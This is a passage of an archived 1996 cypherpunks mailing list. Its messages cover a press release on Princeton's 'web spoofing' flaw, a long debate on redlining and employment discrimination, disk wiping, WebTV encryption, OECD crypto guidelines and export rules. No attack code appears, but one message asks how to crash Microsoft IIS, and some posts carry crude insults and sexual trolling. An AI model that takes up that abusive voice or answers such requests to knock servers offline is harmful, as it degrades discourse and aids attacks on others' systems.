server to place itself between a user and the rest of the
web. In that middle position, the server may observe, steal
and alter any information passing between the unfortunate
browser and the web.

All major web browsers are vulnerable to web spoofing,
including Netscape Navigator and Microsoft Internet
Explorer. Using web spoofing, a person can acquire
passwords, credit card numbers, account numbers, and other
private information, even if transmitted over an apparently
secure connection.

The Boston Globe published an article about Felten's
findings in this morning's "Plugged In" column. The story
was written by Simson Garfinkel, technology columnist for
HotWired's "Packet" news service. The complete story can be
found at the following URL:

http://www.boston.com/globe/glohome.shtml

Felten will be demonstrating web spoofing TODAY, Thursday,
December 12, at the Internet World expo at the Jacob K.
Javits Convention Center in New York City. The
demonstration will be held at the Wiley Computer Publishing
Booth (#822) at 2:00 pm Eastern Time.

The web flaw is just the latest in a series of major
Internet security problems uncovered by Felten and his
team. Felten documents some of these problems in his new
book, "Java Security: Hostile Applets, Holes, and
Antidotes" to be published in January by Wiley Computer
Publishing. For an advance review copy of the book, simply
reply to this e-mail. For further information, please
contact:

Edward Felten: felten@cs.princeton.edu
(917) 972-3693 (cellular phone at Internet World)
(609) 258-5906 (Princeton University)

Jeffrey DeMarrais: jdemarra@wiley.com
Wiley Computer Publishing
(212) 850-6630 (review copies, interviews)

Java Security Web Site:
http://www.rstcorp.com/java-security.html

Safe Internet Programming Web Site:
http://www.cs.princeton.edu/sip/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 21:19:58 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211231927.006a49fc@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(snip)
>You don't have time to explain your beliefs, but you do apparently
>have the time to call me an idiot and, now, to tell me that I am
>intellectually dishonest.  Since you don't know much about me, the
>best you can claim is that I am inconsistent.  I am afraid I cannot
>accept an apology which is prefaced by an insult.

Get over it Red.  Fine.  I called your ideas idiotic.  I called you
intellectually dishonest.  Admitedly ad hominem. Can we bypass it now?

>I would not propose committing fraud.  I do not understand who would

You already have.

>>If I wanted to I could repeatedly issue heart-wrenching stories of
>>poverty in America (similar, of course, to politicians using "real
>>world examples" in speeches).  You seem to assume that this would be
>>"wrong".
>
>No, this is exactly what I've been asking for.  In fact, I explicitly
>suggested that anecdotal evidence based on your experience would have
>value.

I try very hard *not* to simply apply my personal experiences to entire
classes.  I devalue personal stories when discussing policies and try,
_try_ to examine facts.

>No, the point I am making is that it should be legal to be unpleasant
>so long as you are minding your business.  So, employment
>discrimination should be legal, but burning a cross in somebody's lawn
>is a shooting offense.  (Preferably on the lawn in question soon after
>the defense.)

Some of us see little difference.  Employment discrimination causes many
social problems that you causally associate with personal flaws within the
people affected.  I place the blame on the people discriminating.  You
blame the people being discriminated against.  Maybe there is a degree of
blame to go around.

(snip)
>I generally favor governmental interference when somebody is not being
>left alone and is being interfered with in some way by others.  

I am curious as to what governmental interference you do accept.
(snip)
>What puzzles me is that when I mentioned the failure of poor people to
>pursue these beneficial practices you said my comments were "idiotic".
>Now you appear to be saying that I was right, but that poor people
>lack the self-confidence to do these things.  Please explain.

My belief is that poor people lack some of the resources to effectuate
these practices.  Among these are self-confidence as well as a perception
of inability.  Other reasons stem from the very discrimination that I have
rallied against.  You are "right" in that these practices can eliviate
poverty if they are implemented (meaning that people have the will and
means).  

>No, please tell me about your political philosophy.  I am not asking
>which political party you vote for - I am more interested in why you
>vote for it.

Actually, i vote to maximize the influence that i have over public policy.
That of course is not always consistent with my personal political
philosophy.  I could benefit from a remailer at this point and so my
discussion must go .....

>I am curious why people hire an African-American person in the first
>place if they are just going to fire them later.  That doesn't make
>sense to me.  (And, no, I am not being sarcastic, I would like to hear
>an explanation.)

Generally agency.  Hiring is sometimes done by one department and
discriminatory firing by another.  The principle is held responsible.
Sometimes it is direct.  Employers may feel that hiring certain minority
groups allows them to offer lower pay scales.  Then when they have a bad
day, they sometimes deal with their anxiety in illegal ways.  In reality, I
dont think racism can be reasoned away.

>I think the personal harm is in the minds of your clients.  If you are
>fired and your manager says "it's because you're black", this does not
>have to be depressing.

You are right that it does not have to.  And to many it is not.  To some it
is.  It is yet another obstacle to overcome.  The obstacles do keep
building up.  The best way to deal with it is to train everyone to overcome
it.  I also favor other avenues to help.

>I also fail to understand why anybody would want to work for a racist,
>even if you can force the relationship on the employer.

That often is the problem when it comes to remedy.  No one wants to go back
to work.  You do your best to make whole, where no make whole relief can be
found.

>
>Red Rackham
>

Matt


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq+V2rpijqL8wiT1AQFT8QP/d01GTUu6640U4q/jqFPc2OH2qarWri6i
B1GqvG23jZnJxAkJdO3uFy+krhwXYvXRIQORXXe0Y9fqMysib1Udh7de8PNlPyx0
3LjK/lOX/8I3sJTPV6IicCyM/Pwoj9bW20yCdcZDznOQjHTKHr7Q3AsPP9eGWMYw
3DgnVxhCSII=
=3A+0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 21:27:14 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Redlining
Message-ID: <3.0.32.19961211232644.006a1994@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Nor is it to me. So neither of us will likely object to the neural
>net-based lending programs which feed in a bunch of applicant data points,

You will not get objections from me either.  I would advise the banks to
make sure they accept all applicants and widely distribute the
announcement.  I would like them to make extra efforts to examine the
potential market in historically redlined areas.  I am not suggesting
forcing them to do so legislatively.  I never suggested a quota system.

My point is not that inputing all data you will get equivalence between
creditworthiness and racial makeup.  My point is that redlining exists and
I would favor the elimination of the practice.  Given a good program that
somehow magically gets to all potential debtors would have the result I
intend.  Not a quota system.  Equal access to capital.

Matt


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq+XjLpijqL8wiT1AQFD0gQAl1zrV0ngwpHPn4dP3Jv8nPluNexAu/CW
JtWfyMlDY0FGaIbAgqo+CejYNtDQLqqD1HRrPCmCbm3iplE1sDjWiS70loGdd5U0
PbB6Us5SXfUtCaBq4t3HcJtevhechhs4OI8nymw0sHfTrHB8/cxHx309X5t2WTZ2
znNxC8xmZ5g=
=qLqz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Wed, 11 Dec 1996 20:32:31 -0800 (PST)
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Silly me ...
In-Reply-To: <199612112036.MAA05582@ohio.chromatic.com>
Message-ID: <Pine.SUN.3.95.961211233439.632G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have no idea if this is in reference to some thread I missed, but I
think it's unfair.

The evidence of this will be this year's CFP, chaired by the same Kent
Walker.


On Wed, 11 Dec 1996, Ernest Hua wrote:

> About 2 years ago, I attended CFP in San Francisco (really San Mateo,
> but who's counting), and I ran across a presentation by an ex-Justice
> Department dude named Kent Walker presenting the government's side of
> the encryption/wiretap debate.
> 
> He really seemed nice enough, and I tried to chat with him.  My topic
> was how could a good meaning hacker help good meaning government dudes
> figure out details to policies so that everyone is happy.
> 
> Little did I know at that time that this is the same Walker that was
> quoted by Meeks as saying cute lil' gems like ...
> 
>     "If you ask the public, 'Is privacy more important than catching
>      criminals?' They'll tell you, 'No.'"
> 
> ... and ...
> 
>     "It's easy to get caught up in the rhetoric that privacy is the
>      end all be all."
> 
> After a little bit of frustration, I wrote him off as someone cashing
> in on his Justice days to be some VP of government relations (a.k.a.
> lobbyist) with Air Touch.
> 
> Perhaps there is something slightly more spooky with this character
> than I originally thought.
> 
> Ern
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
** Away from Miami -- and at times from the 'net -- Dec. 12 to Jan. 8 **
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Wed, 11 Dec 1996 23:38:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (fwd) Re: WebTV & Encryption
Message-ID: <3.0.32.19691231160000.0069eaa8@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


>[This is a FORWARDED MESSAGE from comp.dcom.telecom]

>In article <telecom16.653.2@massis.lcs.mit.edu> Alan Bishop
><a@corp.webtv.net> wrote:
>
>Howdy.  I'm a software engineer at WebTV Networks.  I certainly don't
>speak for the company, but I can clear up some misunderstandings.
>
>dr@ripco.com (David Richards) writes:
>
[snip]
>
>The box talks to our proxy server over an encrypted channel (using
>TCP/IP).  This allows us to provide a better service to the user
>in several ways:
>
> - privacy for the user.  The number of places that someone could
>   snoop on a user's session are greatly reduced.  We should be
>   publishing a statement on user privacy in the near future
>   describing what we will and won't do with information in our
>   possession.  I believe it's designed to answer the same questions
>   as those posed in
>http://www.cdt.org/privacy/online_services/chart.html.
>   We use strong encryption, and as some of you are already aware,
>   we've been declared a munition by the US government, and the boxes
>   have a "do not export" stamp on them somewhere.
>
> - response time for common sites is more consistent.  The time to
>   connect to a common site is the time between a user's box and the proxy
>   server, not N different sites on the internet.
>
> - we transcode images and other media types.  For example, image
>   creators often make their images too detailed or store them in
>   a format that doesn't compress as well as it should.  We fix that
>   in the proxy before transmitting them over the slow link to the user.
>   It also means that if we want to support a media type, we don't
>   need a new client release: we just add it in the server and convert
>   it to an existing one.
>
[snip]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 21:50:37 -0800 (PST)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: NEWS: Web Security Hole Revealed
In-Reply-To: <v0300784baed5373421d5@[206.119.69.46]>
Message-ID: <199612120546.XAA05186@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


does anyone know how to crash Microsoft IIS (MS webserver)?

many thanks

igor

Robert Hettinga wrote:
> 
> 
> --- begin forwarded text
> 
> 
> X-Sender: okeefe@olympus.net
> Mime-Version: 1.0
> Date: Wed, 11 Dec 1996 19:32:32 -0800
> To: N E W S   R E L E A S E  <IPS@olympus.net>
> From: "Steve O'Keefe" <IPS@olympus.net>
> Subject: NEWS: Web Security Hole Revealed
> 
> BREAKING NEWS
> For Release Thursday, December 12, 1996
> 
> MAJOR  WEB  SECURITY  FLAW  REVEALED
> 
> (New York) -- Edward Felten, head of Princeton University's
> Safe Internet Programming Team (SIP), today revealed a
> major security flaw in the Internet's World Wide Web.
> Called "web spoofing," the breach allows any Internet
> server to place itself between a user and the rest of the
> web. In that middle position, the server may observe, steal
> and alter any information passing between the unfortunate
> browser and the web.
> 
> All major web browsers are vulnerable to web spoofing,
> including Netscape Navigator and Microsoft Internet
> Explorer. Using web spoofing, a person can acquire
> passwords, credit card numbers, account numbers, and other
> private information, even if transmitted over an apparently
> secure connection.
> 
> The Boston Globe published an article about Felten's
> findings in this morning's "Plugged In" column. The story
> was written by Simson Garfinkel, technology columnist for
> HotWired's "Packet" news service. The complete story can be
> found at the following URL:
> 
> http://www.boston.com/globe/glohome.shtml
> 
> Felten will be demonstrating web spoofing TODAY, Thursday,
> December 12, at the Internet World expo at the Jacob K.
> Javits Convention Center in New York City. The
> demonstration will be held at the Wiley Computer Publishing
> Booth (#822) at 2:00 pm Eastern Time.
> 
> The web flaw is just the latest in a series of major
> Internet security problems uncovered by Felten and his
> team. Felten documents some of these problems in his new
> book, "Java Security: Hostile Applets, Holes, and
> Antidotes" to be published in January by Wiley Computer
> Publishing. For an advance review copy of the book, simply
> reply to this e-mail. For further information, please
> contact:
> 
> Edward Felten: felten@cs.princeton.edu
> (917) 972-3693 (cellular phone at Internet World)
> (609) 258-5906 (Princeton University)
> 
> Jeffrey DeMarrais: jdemarra@wiley.com
> Wiley Computer Publishing
> (212) 850-6630 (review copies, interviews)
> 
> Java Security Web Site:
> http://www.rstcorp.com/java-security.html
> 
> Safe Internet Programming Web Site:
> http://www.cs.princeton.edu/sip/
> 
> --- end forwarded text
> 
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA
> "The cost of anything is the foregone alternative" -- Walter Johnson
> The e$ Home Page: http://www.vmeng.com/rah/
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 21:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: I am a stupid cocksucker
In-Reply-To: <199612120052.RAA04610@web.azstarnet.com>
Message-ID: <NJ5syD145w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com writes:

> Secret Squirrel wrote:
>
> >This Christmas Cypherpunks get a special discount: I will
> >suck you off for only $5.
> >
> >Red Rackham
> >
> >PS: I always sign my posts. I am so stupid.
> >PPS: Please killfile me.
>
> Mr Squirrel:
>
> As much as I may appreciate your response to Mr. Rackham's reaction to my
> post, in my sole opinion, Dr. Vulis-style epithets do not contribute to
> reasonable discourse on this list.

You misspelled "Timmy May", asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 21:10:36 -0800 (PST)
To: mjmiski@execpc.com
Subject: Re: Redlining
Message-ID: <01ICWIALAGOWAEL2O3@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 19:43:51.88

>>A "phone" is easy to get, too.  You can get a telephone number which
>>is linked to a voicemail box.  You can even get this number listed in
>>the telephone book, if you like.  The cost of this service should be
>>less than twenty dollars a month.  If you want to go wild, you can get
>>a pager linked voicemail number.  This means your pager goes off when
>>you get a message.  Handy.

	Actually, I've heard about one charitable project in which they were
giving homeless people voicemail numbers and doing just this. I believe it was
in Houston or someplace else in Texas, but my memory is horribly bad. A nice
effort.

>If I wanted to I could repeatedly issue heart-wrenching stories of poverty
>in America (similar, of course, to politicians using "real world examples"
>in speeches).  You seem to assume that this would be "wrong".

	As did Ronald Reagan in talking about "welfare queens"... as could I
in discussing how my grandparents got out of poverty and have two children with
MDs and one with a PhD. Statistics are preferable to anecdotal evidence for
just this reason; I've seen that over and over again in science. Anecdotes are
for lawyers talking to juries and demagogic politicians talking to the masses.

>Once again, we disagree.  You do not favor any form of government
>regulation.  I do favor some forms of government regulation.  It seems that
>the turning point for you is your belief that racism causes no real harm.
>I disagree.  If you really want to have a list of the harms caused by
>racism, I will list them in a seperate note to you.  I wish you could be
>intellectually honest enough to realize these harms.  I fear, however, you
>will not be.

	While it is perfectly true that racism causes harms, that is true of
most actions. When I choose to vote in favor of a Libertarian instead of a
Republican or a Democrat, I am harming the Democratic and Republican candidates
for a position. As I pointed out earlier, by _correctly_ deeming someone to be
a poor credit risk and not lending them money, a lender is doing that person
harm... to the degree that redlining due to racism causes harm.
	I believe, however, you're trying to claim that redlining due to
racism is causing the same sort of harm as a KKK lynching. I'm afraid that it's
pretty obvious that there are differences between the two. The KKK lynching is
forced on one side; the other is not. You might contend that refusing to loan
to someone is forcing them to do without that loan... but so is a refusal to
loan money to _anyone_. The ultimate extension of this idea would lead to
mandated savings accounts.
	In other words, there is a difference between what one should not do
and what one should be punished for doing. I happen to believe that anyone who
makes homophobic speech is doing something wrong... but I don't want various
list members locked up on that basis.

>I do not know where you live, but I live in the US.  Cryptoanarchy has not
>taken hold here yet.  As such, my discourse is regarding the political
>system in which I live.  As such I favor regulating behavior between the
>small number of protected classes and the small number of covered
>transactions (employment, housing, etc.).  You, OTOH, do not.

	Umm... you had earlier stated that you had decided that you were not
a libertarian, and did not have libertarian beliefs. This would appear to
imply that you would prefer to see such regulations even in a cryptoanarchic
society... where (as Red, TCMay, and others have pointed out) they would not
be possible. (I am not actually in favor of full cryptoanarchy, personally;
but I am a libertarian, and I believe that an increased use of cryptography
would not lead to full cryptoanarchy, but to a reduction in the size of
government to where abuses such as anti-discrimination laws were not
practical to enforce.)

>And neither do I.  On balance, I would not have accepted prohibition then,
>and I do not accept it now.  People also have a preference not to hire
>blacks.  I feel that that should not be an acceptable means of interaction
>between an employer and a prospective employee.  You do.  That is what I
>meant by drawing lines.  You feel that every employer (a creation of the
>state) should have the ability to act in a discriminatory fashion.  I
>disagree.  You and I do agree that when the personal excercise is for a
>drink, the government should not respond.  This is because, on balance, I
>believe that the excercise of that freedom is more important than the
>adverse effects of alcoholism.  And vice versa for employment discrimination.

	In other words, you are quite willing to shoot someone for being a
racist... for expressing their beliefs, even if they aren't doing so by
shooting at you. Ultimately, that's what we're talking about... if an
employer (or a bank, or an insurance company) goes far enough, they will find
a cop with a gun pointing it at them to enforce the fines et al. If it were
a bunch of KKK types wanting to lynch you (or anyone else), I'd be right behind
you saying they should be shot. But shooting someone for refusing to do
business with you is one act of murder that I'd prefer to keep government
around to _prevent_.
	I find it interesting that you claim that an employer is a creation
of the state. I suppose that you would not consider a Mafia kingpin, or a
Kali cartel boss, to be an employer? It appears that the employee-employer
relationship is one that gets set up in any economy that is large enough
and which has specialization of labor. It isn't a creation of the state.

>Once again, I would determine policy based on several competing interests.
>Aparently you would determine it on a notion of absolute freedom.  I am
>trying not to assume anything.  And for the record, I have only supported
>governmental intervention in currently accepted transactions, which do not
>cover individuals wanting to hold racist beliefs.

	Umm... the last statement is meaningless. Your first statement
essentially says that you're willing to give up freedom for security or
whatever else you deem important... not advisible in the long run; that's
how Hitler got started.

>I believe in regulating, in one instance, employment discrimination.  I do
>so because I have personally seen the economic impact on the Greater
>Milwaukee Area of such discrimination - both past and present.  I believe X
>also because I have been witness to the personal impact that such
>discrimination has upon people.  To take advantage of practices effective
>against poverty, several of which you have mentioned, it helps to have
>self-confidence and a degree of self-worth.  These are directly damaged by
>employment discrimination.  I believe that the elimination of redlining
>would help to increase capital flows into some of these affected areas.
>Even if, as you stated, the elimination would allow for a few token
>investments in order for banks to appear to be in compliance, that is a
>willing trade off for me.  It is not for you.

	I am not happy with people who discriminate either; I've run into
entirely too many of them. But I don't consider shooting people, or (as in the
present case) threatening to shoot them, to be a proper response. Quite
simply, your emotions are not a justification for the use of force; the use of
force against you (or someone else) is.

>^^^^^^^This was, of course, my explanation before.  Apparently you didnt
>see it.
>I was not using libertarian's ideal society in any derogitive way.  At one
>time I believed in it.  Through self-examination I decided that it couldnt
>work.  Is your point that you disagree with me or that Anyone who disagrees
>with you must be wrong?

	Given that you didn't give any cogent reasons _why_ a libertarian
ideal society wouldn't work, of course Red ignored it. Make an argument, not
rhetoric, not simple statements of your opinions. Your opinions are meaningless
without something to back them. That doesn't mean that you shouldn't be able
to have them or to voice them, of course... but it does mean that we shouldn't
allow governmental policy to be based on them.

> If you are really interested I will roll out what I perceive as the many
>harms caused by racism.  Unlike you, I am in no rush to call your reasons
>for your beliefs "good" or "bad".  You believe as you do.  You do so
>because of personal reasons.  I believe as I do, that racism harms people.

	I would like to point out that this is a prime example of the
Politically Correct variety of pluralism. Quite simply, one _must_
discriminate (in the older sense of the word) between beliefs that make sense,
beliefs that do not make sense, and beliefs on which one cannot tell (e.g.,
theism vs atheism). One should avoid making governmental decisions - decisions
involving force upon others - that are not based on beliefs that make sense.
You have yet to be convincing in arguing that your beliefs make sense.

>I do so because of my personal experiences.  Among these are employees
>explaining to me the nature of the discrimination that they have suffered,
>their inability to pursue any such claims because of a lack of both
>self-confidence as well as capital, the faces of their children that do not
>yet understand the nature of the world they have been brought into and the
>immense stress on familial relationships caused by the lack of a job caused
>by employment discrimination.  Ill even discard the borderline cases and
>refer to the slam dunk cases out there.  I live and work in Milwaukee, Red.
> People are fired and told they are fired because they are black.  I have
>settled cases with no dispute of these facts.  All of the personal harm and
>more was suffered by my clients.  This is part of the reason for my
>perception.  I wish I lived where you did where racism hurts nobody.  Just
>give me a general location and Ill start to move my clients there ;-|.

	Lack of self-confidence? Please reference my comments on emotions
above to see why this _isn't_ a justified reason to threaten violence. Being
fired because they're black? I'll perfectly well agree that this is wrong...
to use (an admittedly much lesser) example from my personal life, I've been
turned down for a job as a _word processor_ because I couldn't type fast
enough on a _manual_ typewriter (in case you're wondering, my measured
typing speed on a computer would have been quite fast enough).  I told them
they were idiots and walked out; I looked for a job someplace else. Let me
assure you that a job would have been quite helpful at that point.
	In other words, yes, people are assholes. This doesn't justify sticking
a gun into their faces, directly or indirectly, unless they're trying to kill
you, steal your property, or otherwise _truly_ harm you.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 11 Dec 1996 21:33:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612120519.AA20735@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


>Anonymous wrote:
>> Dale Thorn sez:
>> >Jamie Lawrence wrote:
>
>[snip]
>
>> >But nobody answered my question:  Is there a shortcut way to do the
>> >wipe, say, thirty times?  Ordinarily, I'd run the program thirty
>> >times, which would consist of a data write followed by a flush,
>> >which would take 30x amount of time.
>
>> Buffered writes won't work for obvious reasons. You must make raw
>> writes to the sectors you seek to scramble after you gather information
>> about what sectors you want to write.
>
>That much I've known for 15 years or so....
>

Hey you asked!

>> The innovation you are looking for is
>> called "the loop". You can implement "the loop" many ways including
>> taping the end of your program to the beginning. Be careful not to
>> accidentally twist the paper as this will cause your writes to become reads.
>> If you are using punch cards you are SOL. sheesh.
>> Remind me not to use any of Dale's "utilities".
>
>You would not likely ever have the opportunity to use such utilities,
>since you obviously lack certain basic ingredients of intelligence.
>I don't do "user-friendly" GUI programs, but I suppose this list is
>full of MAC users for reasons known only to themselves (I don't want
>to know).

Ahh come on Dale. Lay one one us! Are you now writing
"utilities" in portable batch files? I'd love to see one. 
Or are you a bare metal guy typing in hex codes in debug?

btw, how do you like Win95? Too user-friendly for you?

Message-ID: <32AE5411.6C56@gte.net>
Date: Tue, 10 Dec 1996 22:26:25 -0800
From: Dale Thorn <dthorn@gte.net>
X-Mailer: Mozilla 2.01E-GTE  (Win95; U)

But hey! Real men don't boot gui. Right?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 21:32:16 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Redlining
Message-ID: <01ICWJ1E2BX2AEL2O3@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 11-DEC-1996 23:46:57.12

>I would appreciate if some attorney on this list shed some light on the
>legal definition of discrimination.

	I am not an attorney by any means, but I have looked over the
Griggs vs Power decision (which effectively outlawed the use of most
standardized tests, such as IQ tests, for employment purposes). A means
of deciding on employment is discriminatory if the following are both
true:
	A. Under it, members of a protected minority do worse;
	B. It has not been shown to be _specifically_ relevant to a job.

Please note the second one; this means, effectively, that if you haven't
done a full study of people who have done the job and correlated their
performance with their scores on the test, it may be discriminatory.
You can't use the simple information that an IQ test score is correlated
with essentially all job performance measures yet done on any jobs not
intended for the mentally retarded. Obviously, this task can't be done
by anyone but the largest employers, and they are generally hindered
in doing so by:
	A. Being governments or government contractors, and thus
		susceptible to political pressure;
	B. Having unions which object to any job performance measures.

I'd appreciate any lawyerly comments that contradict me, particularly
in view of some later (and saner) Supreme Court rulings on the matter.

	-Allen

P.S. Please note that we cannot yet tell if the racial differences in
IQ are environmental or a mixture of environmental and genetic; I
believe they are purely environmental, but there is about as much
evidence for this belief as there is for God's existence (something
I also believe in).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 22:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.LNX.3.95.961211211200.1697A-100000@gak.voicenet.com>
Message-ID: <cm7syD148w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M." <markm@voicenet.com> writes:
> On Wed, 11 Dec 1996, Igor Chudov @ home wrote:
>
> > I do not see any reason why Java code cannot be compiled. I think that
> > now there are java compilers available. Maybe even browsers will have
> > smarts to compile code that they execute.
>
> I assume you mean compiling Java bytecode to native machine code.  I don't kn
> of any program that can do this, but Cygnus is developing a Java compiler tha
> compiles Java to a stand-alone executable.  Details at
> http://webhackers.cygnus.com/webhackers/projects/java.html .

It would be very foolish to touch any shit that comes out of Cygnus.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Wed, 11 Dec 1996 08:31:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: OECD crypto policy draft guidelines
Message-ID: <199612111630.DAA16555@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


What is this list about?? Religion, the semantics of reality vs.
perception or doing something constructive about crypto policy???

The latest draft of the OECD guidelines are now at my WWW site.  

    http://www.ozemail.com.au/~firstpr/crypto/oecd_dr.htm

Check them out - especially para 59.  All the bad bits have been 
relegated to debateable things in square brackets.

Get your mind into this and get your comments to Marc Rotenberg - who 
I understand is involved with the OECD crew.

So much for "PICS is not censorship" being off topic for this list!

- Robin

. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SAVE NOW <youwin@isp-inter.net>
Date: Thu, 12 Dec 1996 06:21:03 -0800 (PST)
Subject: (UCE)  Corp Buying Power - SAVES YOU $$$
Message-ID: <199612121331.IAA05618@Arl-Mail-Svc-1.compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



NEW - CORPORATE BUYING POWER
       $$$$$ SAVES YOU $$$$!!!

NOW YOU CAN TAKE ADVANTAGE OF 
         ****  MONEY SAVING   ****
***  CORPORATE BUYING POWER ***
FOR YOUR HOME AND BUSINESS!!

Dear friend and fellow money-saver,

I want to save you some money!!!

A billion dollar company has just launched a package of 
products and services designed to give you some of the same
buying advantages major corporations enjoy!

Did you know corporations get special rates at hotels and 
on other travel??

Now you can get similar GREAT discounted rates
on airfare, hotels, rental cars, vacation and spa packages too!!

Did you know corporations get special rates on communciation
services like long distance, paging, conference calling,
and fax-on-demand??

You can get low rates on these state-of-the-art communciation
services just like the big guys...enhancing your professional
image, providing better service to your customers, and 
cutting expenses!!

And this is only the beginning of the savings avaliable
to YOU!!

To find out how you can start enjoying your own 
          *****  MONEY SAVING   *****
***  CORPORATE BUYING POWER  *** 
Just reply to this message at mailto:savenow@isp-inter.net
The full details of this exceptional offer will be returned to 
your mailbox shortly!!


**************************************************************************
Please join our remove group if you do not like getting commercial
e-mail. mailto:ssremove@isp-inter.net with REMOVE in SUBJECT
Please note any unsolicited  mail sent from the domain isp-inter.net
has a flag  (UCE) on the subject heading for Unsolicited Commercial
E-mail. Report  E-mail violators to mailto:violators@isp-inter.net. 
Please inform your provider of our efforts and ask them to support
ISP.  If you would like us to sent you info on setting up Pegasus to
perform this for you, mail your request to mailto:efforts@isp-inter.net







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 12 Dec 1996 04:08:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: EXT_ort
Message-ID: <1.5.4.32.19961212120514.006980d8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 "U.S. Will Modestly Revise Encryption Exports Rule"
 
 The Administration will modestly revise controversial 
 export rules for computer encoding technology after a 
 private meeting Wednesday with computer and 
 telecommunications companies, Reinsch said after the 
 hour and a half long meeting. Industry officials argued at 
 the meeting that the draft rules were unclear or unworkable 
 on a number of points. BSA said, "We are not optimistic that 
 these rules will be turned around and we feel going to 
 Congress is our only option."


 "Industry Gears Up To Oppose Newest Encryption Plan"

 Opposition is mounting to the newest draft plan floated Mon. 
 by the Administration. One company representative called 
 the plan "policy extortion." Until now, most opposition has 
 come from software industry; some hardware  companies 
 are now starting to edge away.

 One rule appeared to expand types of communications 
 subject to key system, noting that rule said that products 
 referred to text of "encrypted data and communications." 
 That could be interpreted as e-mail. The document 
 showed that law enforcement agencies had the upper 
 hand.

-----

EXT_ort





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
